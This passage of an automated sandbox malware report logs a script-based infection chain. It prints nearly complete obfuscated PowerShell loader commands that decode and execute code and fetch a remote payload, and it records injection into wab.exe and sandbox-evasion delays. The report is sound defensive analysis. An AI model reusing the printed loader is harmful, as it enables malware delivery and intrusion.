            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8112Thread sleep count: 3201 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8112Thread sleep count: 6615 > 30Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599782s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599658s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599407s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599282s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599172s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -599063s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598938s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598813s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598563s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598452s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598219s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -598081s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597723s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597594s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597141s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -597031s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596922s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596811s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596688s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596469s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -596110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595985s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -595110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594989s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594860s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594610s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594485s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594360s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 8100Thread sleep time: -594110s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\cmd.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599658Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599172Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598563Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598452Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598219Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 598081Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597723Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597594Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 597031Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596922Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596811Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596469Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 596110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595985Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 595110Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594989Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594860Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594610Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594485Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594360Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 594110Jump to behavior
            Source: powershell.exe, 00000007.00000002.2633083734.000001B6D9D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsf%SystemRoot%\system32\mswsock.dllEgot.FraseCS midoColomnSybilvOmraaeGonorrHochet Int ]Spytk:Humor:Evoc.F egimr.astroBesvrmKasseBenkelaSkaktsNordieLgg,r6Tu,en4BortfSOpalitMesmer langi DilanThromgFolke( Thym$Om,ryENoneqg Te.eoSyn,etUngerrBrakeiMastopAsbespBttef{
            Source: wscript.exe, 00000000.00000002.1693047958.000001CF458BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: wscript.exe, 00000000.00000003.1690205040.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1693745315.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671838284.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1693108538.000001CF458C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671772299.000001CF458AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1690508497.000001CF458C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671339268.000001CF477C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1671988341.000001CF477C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C80000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 58FB44Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping google.com -n 1Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping %.%.%.%Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dirJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Prohostility = 1;$Panthaver='Substrin';$Panthaver+='g';Function Posthoc168($Forretningssteds){$Reservedel=$Forretningssteds.Length-$Prohostility;For($Kombinat=5; $Kombinat -lt $Reservedel; $Kombinat+=(6)){$Samvrsproblemer48+=$Forretningssteds.$Panthaver.Invoke($Kombinat, $Prohostility);}$Samvrsproblemer48;}function Halvkusinen($Teraglin){& ($Positivernes) ($Teraglin);}$Dykkerurenes=Posthoc168 'flertMPhy.ooFestrzRigniiAbsurl Solul ud,taLamin/brnes5te.ta. Glu.0 ,aag Enkem(SekspWPa,eoiOpr.snMaidhd Aluno tudewSengesmidda DeterNSubskTSemir smara1 Tabt0Dekla. top 0Demon;alcme TransWRepreiBl.amn Tona6 Jauk4Bret,;Stutt Ch,mpx Ha.i6Def e4Mllen;Skinn Strawr,onvevDolio:Oecod1 nvol2Contr1Mega,.Cycla0Bille).ucce Dep sGJa eyeSl vecUnmeekStamboEksku/Fo,ke2Palae0Halvb1Inte.0Flyba0Strut1C.mpo0P,oto1 chir TugtFKorruiKas.er.peciePrincfbenzdo BortxBlr,g/tungt1Gr.se2Nonpe1Aftrd.Sling0Ordsg ';$Crabbiness=Posthoc168 'SkovdU MultsGavfleCausarSacch- onreA KrydgSammee,diotnIntemtPilh. ';$Forundendes79=Posthoc168 'BeaujhFaglit CamotUomstp Ha v:Nondi/ Spej/Mis.rm.adinnAus.oaUnconjC,untj plejaFor,rrLinj..Imperdava,leUhyrl/JeppevDyknis,quidpPrede1Ziara/RegelD ParauUnpropHyp rlBa,isoPreex.Zt,bomGamensEnolaoTvrfl ';$tacketed=Posthoc168 ' Trad>Mucid ';$Positivernes=Posthoc168 'F rhaiVegtseCupruxDilat ';$Gangstol = Posthoc168 'Djvl,esuppucRaglahRe leoLardo .awky%,ilggaSporhpRasmupmaskiddrejbaReat tC,preaEmmer%A biv\TaxafL Ambiu UblomGlob.iTrappnanprieStrifs yklcStligeHa,stndogmac O rienevadsDispl. Si,isPostnkGalejaDorat D,ar& Swab&Vedte BaidaeOpstic .iblh ,tomoGeise vola$Oz ge ';Halvkusinen (Posthoc168 'Pixel$DrejegTromplSkydeoLactib Jorda ingulSkg.a:KrympFA,ryle Un nm UnsloNick g itratNonteyUruguv Ledee KbstnVisi.d.enfoe Semi=Sorge(.ecatc glu.mNajedd Mble Hyper/AagercNordi Fals$DemonG yndaResonnJ ltjgBittesTrendtPrivaoHorn.ltrach)Tel,f ');Halvkusinen (Posthoc168 'Insul$Coinfg Un clRegr oFeriebVerboaDreadlAnmie:MoralT .aggrSareeeGuinedAfkome Erh lPi,antStemmerheu.sTaxic2Ind g0.umuh=Rabb.$SkrmsFPyrono EchorLotosu Trapn eetdAbbedeLingun.alkad SpineCo,gasRadio7S.eri9Podi .I.fins,libnp Uns,l Teali Pic,tJobna( Vagi$SnaggtArtsbaLig.ecTaxiekSlutneOccidtGalace,ndbodJeonm)Subin ');$Forundendes79=$Tredeltes20[0];Halvkusinen (Posthoc168 'Melit$Welleg.ormal.ninsoTota b WitmaInt.rlComor:Ba,ndPBr ureUndeclSjlsrs Dr,uvInr,drlimitk Skva= PostN SueveKv.rtw Stil-F ldnOReasobKvaddj Ty.eeBiovac armhtHo or JvnesSWieneyFen rsAn,vatPraese.emgtmLat.e.PerlaN egraeBiltrt Aspc.,ombyW DleseVkstrbBardiCLami lTrianiAccede AthenSplentGelee ');Halvkusinen (Posthoc168 ' anh$ refoP F.lgeHal,ll ServsD,ffev Nonar R gnkBevan.LaaseHS ydeeKlas.a antid B ineHnekyrSa dbs,rimi[Si,ke$Scru CTaoisrAr.piaStnknbIrna,b ldeliS,ivfn rypteFid.bsLg.etsSuffr],isob=Forsv$SelvoDPlaybyHo.sekProtekstreneArchirSecreuSa,itrSprage Guttn S.ineUnespsH emn ');$Prostatectomy=Posthoc168 'CacoxPLatche JordlSilvasSJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Luminescences.ska && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen (posthoc168 'insul$coinfg un clregr oferiebverboadreadlanmie:moralt .aggrsareeeguinedafkome erh lpi,antstemmerheu.staxic2ind g0.umuh=rabb.$skrmsfpyrono echorlotosu trapn eetdabbedelingun.alkad spineco,gasradio7s.eri9podi .i.fins,libnp uns,l teali pic,tjobna( vagi$snaggtartsbalig.ectaxiekslutneoccidtgalace,ndbodjeonm)subin ');$forundendes79=$tredeltes20[0];halvkusinen (posthoc168 'melit$welleg.ormal.ninsotota b witmaint.rlcomor:ba,ndpbr ureundeclsjlsrs dr,uvinr,drlimitk skva= postn suevekv.rtw stil-f ldnoreasobkvaddj ty.eebiovac armhtho or jvnesswieneyfen rsan,vatpraese.emgtmlat.e.perlan egraebiltrt aspc.,ombyw dlesevkstrbbardiclami ltrianiaccede athensplentgelee ');halvkusinen (posthoc168 ' anh$ refop f.lgehal,ll servsd,ffev nonar r gnkbevan.laasehs ydeeklas.a antid b inehnekyrsa dbs,rimi[si,ke$scru ctaoisrar.piastnknbirna,b ldelis,ivfn ryptefid.bslg.etssuffr],isob=forsv$selvodplaybyho.sekprotekstrenearchirsecreusa,itrsprage guttn s.ineunespsh emn ');$prostatectomy=posthoc168 'cacoxplatche jordlsilvass
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$prohostility = 1;$panthaver='substrin';$panthaver+='g';function posthoc168($forretningssteds){$reservedel=$forretningssteds.length-$prohostility;for($kombinat=5; $kombinat -lt $reservedel; $kombinat+=(6)){$samvrsproblemer48+=$forretningssteds.$panthaver.invoke($kombinat, $prohostility);}$samvrsproblemer48;}function halvkusinen($teraglin){& ($positivernes) ($teraglin);}$dykkerurenes=posthoc168 'flertmphy.oofestrzrigniiabsurl solul ud,talamin/brnes5te.ta. glu.0 ,aag enkem(sekspwpa,eoiopr.snmaidhd aluno tudewsengesmidda deternsubsktsemir smara1 tabt0dekla. top 0demon;alcme transwrepreibl.amn tona6 jauk4bret,;stutt ch,mpx ha.i6def e4mllen;skinn strawr,onvevdolio:oecod1 nvol2contr1mega,.cycla0bille).ucce dep sgja eyesl vecunmeekstamboeksku/fo,ke2palae0halvb1inte.0flyba0strut1c.mpo0p,oto1 chir tugtfkorruikas.er.pecieprincfbenzdo bortxblr,g/tungt1gr.se2nonpe1aftrd.sling0ordsg ';$crabbiness=posthoc168 'skovdu multsgavflecausarsacch- onrea krydgsammee,diotnintemtpilh. ';$forundendes79=posthoc168 'beaujhfaglit camotuomstp ha v:nondi/ spej/mis.rm.adinnaus.oaunconjc,untj plejafor,rrlinj..imperdava,leuhyrl/jeppevdyknis,quidpprede1ziara/regeld parauunprophyp rlba,isopreex.zt,bomgamensenolaotvrfl ';$tacketed=posthoc168 ' trad>mucid ';$positivernes=posthoc168 'f rhaivegtsecupruxdilat ';$gangstol = posthoc168 'djvl,esuppucraglahre leolardo .awky%,ilggasporhprasmupmaskiddrejbareat tc,preaemmer%a biv\taxafl ambiu ublomglob.itrappnanpriestrifs yklcstligeha,stndogmac o rienevadsdispl. si,ispostnkgalejadorat d,ar& swab&vedte baidaeopstic .iblh ,tomogeise vola$oz ge ';halvkusinen (posthoc168 'pixel$drejegtromplskydeolactib jorda ingulskg.a:krympfa,ryle un nm unslonick g itratnonteyuruguv ledee kbstnvisi.d.enfoe semi=sorge(.ecatc glu.mnajedd mble hyper/aagercnordi fals$demong yndaresonnj ltjgbittestrendtprivaohorn.ltrach)tel,f ');halvkusinen 